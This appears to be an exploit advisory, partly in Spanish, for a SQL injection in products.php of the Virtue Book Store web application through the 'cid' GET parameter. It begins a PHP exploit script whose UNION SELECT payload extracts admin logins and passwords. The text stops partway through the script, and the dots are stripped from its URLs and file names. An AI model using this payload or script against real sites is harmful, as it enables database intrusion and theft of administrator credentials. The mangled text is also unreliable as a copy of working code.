SQL injection vulnerability in products.php in Virtue Book Store allows remote malicious users to execute arbitrary SQL commands via the cid parameter.
CMS : Online Book Store
WEB : wwwvirtuenetzcom/book/
Archivo : productsphp
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : wwwsitecom/productsphp?cid=[SQLI]
Exploit :
<?
$web = $argv[1];
$url = $web"productsphp?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+ ...